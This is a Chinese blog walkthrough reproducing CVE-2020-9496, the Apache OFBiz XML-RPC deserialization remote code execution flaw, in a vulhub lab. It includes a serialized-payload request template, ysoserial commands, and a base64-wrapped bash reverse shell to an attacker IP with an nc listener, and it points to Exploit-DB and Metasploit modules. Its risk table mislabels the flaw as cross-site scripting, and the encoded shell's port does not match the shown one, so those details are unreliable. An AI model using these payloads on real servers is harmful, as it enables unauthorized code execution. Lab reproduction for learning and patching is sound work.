CVE-2020-9496 Apache OFBiz XML-RPC反序列化漏洞复现

CVE-2020-9496 Apache OFBiz XML-RPC反序列化漏洞

1. 概述

1.1 OFBiz

OFBiz 是开放的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。

1.2 漏洞简述

2020年09月29日, 360CERT对Apache OFBiz组件的反序列化漏洞进行了分析,该漏洞编号为 CVE-2020-9496,漏洞等级:高危,漏洞评分:8.0 Apache OFBiz 存在反序列化漏洞,攻击者通过访问未授权接口,构造特定的xmlrpc http请求,可以造成远程代码执行的影响。

1.3 风险等级

评定方式 等级
CVSS Score 4.3
360CERT 8.0
可利用性 中等
影响面 一般
漏洞类型 Cross Site Scripting

在这里插入图片描述

1.4 影响范围

Apache Ofbiz:< 17.12.04

1.5 漏洞详情

XML-RPC

XML-RPC是一种远程过程调用(RPC)协议,它使用XML对其调用进行编码,并使用HTTP作为传输机制。它是一种规范和一组实现,允许软件运行在不同的操作系统上,运行在不同的环境中,通过Internet进行过程调用。在XML-RPC中,客户端通过向实现XML-RPC并接收HTTP响应的服务器发送HTTP请求来执行RPC。

2. 环境配置

2.1 方案一:vlufocus在线平台

登录vlufocus官网,搜索漏洞编号并启动

在这里插入图片描述

2.2 方案二:在docker中搭建

在GitHub中搜索并下载vulhub

git clone https://github.com/vulhub/vulhub.git

  1. 进入漏洞目录
    cd vulhub/ofbiz/CVE-2020-9496/

  2. 使用docker-compose拉取漏洞环境
    docker-compose up -d

  3. 显示绿色的done表示搭建成功
    Done

    在这里插入图片描述

2.3 访问测试

  • Login页面
    http://ip:port/myportal/control/main

    在这里插入图片描述

  • xmlrpc页面
    http://ip:port/webtools/control/xmlrpc

    在这里插入图片描述

注:

访问时可能遇到以下问题

在这里插入图片描述

  1. 检查端口占用情况,kill占用端口
  2. 使用“https”进行访问

3. 漏洞复现

3.1 准备工作

配置Java环境

可以直接使用Kali,这里不赘述Java配置细节

配置Maven

  1. 使用wget下载mvn:

    wget https://mirrors.bfsu.edu.cn/apache/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz

  2. 创建目录

    mkdir /opt/maven

  3. 解压

    tar zxvf apache-maven-3.6.3-bin.tar.gz -C /opt/maven/

    在这里插入图片描述

  4. 配置环境变量

    export MAVEN_HOME=/opt/maven/apache-maven-3.6.3

    export PATH=$MAVEN_HOME/bin:$PATH

  5. 检查版本
    mvn -version

    在这里插入图片描述

准备Payload

  1. 在GitHub找到CVE-2020-9496 Apache OFBiz的payload下载到本地

    在这里插入图片描述

    解压后打开txt文件得到如下代码

    <?xml version="1.0"?>
    <methodCall>
    <methodName>ProjectDiscovery</methodName>
    <params>
        <param>
        <value>
            <struct>
            <member>
                <name>test</name>
                <value>
                <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">
                [Payload]
                </serializable>
                </value>
            </member>
            </struct>
        </value>
        </param>
    </params>
    </methodCall>
    

    这里是准备的第一个payload

  2. 在GitHub找到java反序列化利用工具ysoserial

    在这里插入图片描述

    clone到本地
    git clone https://github.com/frohoff/ysoserial.git

    在这里插入图片描述

  3. 进入ysoserial目录使用maven下载编译需要得包

    mvn clean package -DskipTests

    在这里插入图片描述

  4. 下载完成后进入ysoserial中的target目录

    使用使用ysoserial的CommonsBeanutils1来生成Payload在tmp目录写入文件

    这里是准备的第二个payload

    java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "\n"

    在这里插入图片描述

3.2 漏洞利用

  1. 打开目录,抓包
    http://ip:port/webtools/control/xmlrpc

    在这里插入图片描述

  2. 发送到Repeater模块

    在这里插入图片描述

  3. 改包:

    1. GET→POST
    2. 复制黏贴Payload-1
    3. 在Payload-1中如图所示位置替换Payload-2

    在这里插入图片描述

    在这里插入图片描述

  4. Send后显示200成功,在docker中打开命令行查看是否写入成功 ls /tmp/

    在这里插入图片描述

  1. 利用Bash命令反弹Shall,需要绕过

    bash -i >& /dev/tcp/attacker_ip/2333 0>&1

    这里修改为攻击机的IP和监听端口

    1. 对bash命令进行base64编码

      YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMi4xMjgvNDQ0NCAwPiYx

      bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMi4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}'

    2. 再对编码后的shell使用ysoserial工具进行一次base64编码

    在这里插入图片描述

  2. 开启监听 nc -lvp 2333

  3. BP改包然后Send,显示200成功

    在这里插入图片描述

  4. Getshell

    在这里插入图片描述

3.3 其他方式的漏洞利用

Exploit_DB

  1. 在Exploit_DB库中搜索相关漏洞

    https://www.exploit-db.com/exploits/50178

    在这里插入图片描述

  2. 下载利用代码,在虚拟机中配置好python环境并运行

    在这里插入图片描述

Msf

  1. 打开Kali,运行msfconsole

  2. search CVE-2020-9496

    在这里插入图片描述

  3. use 0

  4. 设置相应模块

    在这里插入图片描述

  5. run

4. 版本修复

  1. 直接在controller.xml配置xmlrpc需要授权访问。
  2. 升级到最新版本

5. 总结

xmlrpc 本身是支持对序列化数据的反序列化的,而问题就出现在ofbiz没有对xmlrpc接口的访问做权限的控制,同时版本较低的情况下又存在能够被反序列化所利用的依赖。

6. References

CVE Details (2020) CVE-2020-9496. Available at: https://www.cvedetails.com/cve/CVE-2020-9496/…(Accessed: 22 Aug 2022).

东塔网络安全学院. (2021) ‘Apache Ofbiz XMLRPC RCE漏洞(CVE-2020-9496)复现’, CSDN, 20 Feb. Available at: https://blog.csdn.net/m0_48520508/article/details/…(Accessed: 22 Aug 2022).

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐


学习编程是顺着互联网的发展潮流,是一件好事。新手如何学习编程?其实不难,不过在学习编程之前你得先了解你的目的是什么?这个很重要,因为目的决定你的发展方向、决定你的发展速度。
IT行业是什么工作做什么?IT行业的工作有:产品策划类、页面设计类、前端与移动、开发与测试、营销推广类、数据运营类、运营维护类、游戏相关类等,根据不同的分类下面有细分了不同的岗位。
女生学Java好就业吗?女生适合学Java编程吗?目前有不少女生学习Java开发,但要结合自身的情况,先了解自己适不适合去学习Java,不要盲目的选择不适合自己的Java培训班进行学习。只要肯下功夫钻研,多看、多想、多练
Can’t connect to local MySQL server through socket \'/var/lib/mysql/mysql.sock问题 1.进入mysql路径
oracle基本命令 一、登录操作 1.管理员登录 # 管理员登录 sqlplus / as sysdba 2.普通用户登录
一、背景 因为项目中需要通北京网络,所以需要连vpn,但是服务器有时候会断掉,所以写个shell脚本每五分钟去判断是否连接,于是就有下面的shell脚本。
BETWEEN 操作符选取介于两个值之间的数据范围内的值。这些值可以是数值、文本或者日期。
假如你已经使用过苹果开发者中心上架app,你肯定知道在苹果开发者中心的web界面,无法直接提交ipa文件,而是需要使用第三方工具,将ipa文件上传到构建版本,开...
下面的 SQL 语句指定了两个别名,一个是 name 列的别名,一个是 country 列的别名。**提示:**如果列名称包含空格,要求使用双引号或方括号:
在使用H5混合开发的app打包后,需要将ipa文件上传到appstore进行发布,就需要去苹果开发者中心进行发布。​
+----+--------------+---------------------------+-------+---------+
数组的声明并不是声明一个个单独的变量,比如 number0、number1、...、number99,而是声明一个数组变量,比如 numbers,然后使用 nu...
第一步:到appuploader官网下载辅助工具和iCloud驱动,使用前面创建的AppID登录。
如需删除表中的列,请使用下面的语法(请注意,某些数据库系统不允许这种在数据库表中删除列的方式):
前不久在制作win11pe,制作了一版,1.26GB,太大了,不满意,想再裁剪下,发现这次dism mount正常,commit或discard巨慢,以前都很快...
赛门铁克各个版本概览:https://knowledge.broadcom.com/external/article?legacyId=tech163829
实测Python 3.6.6用pip 21.3.1,再高就报错了,Python 3.10.7用pip 22.3.1是可以的
Broadcom Corporation (博通公司,股票代号AVGO)是全球领先的有线和无线通信半导体公司。其产品实现向家庭、 办公室和移动环境以及在这些环境...
发现个问题,server2016上安装了c4d这些版本,低版本的正常显示窗格,但红色圈出的高版本c4d打开后不显示窗格,
TAT:https://cloud.tencent.com/document/product/1340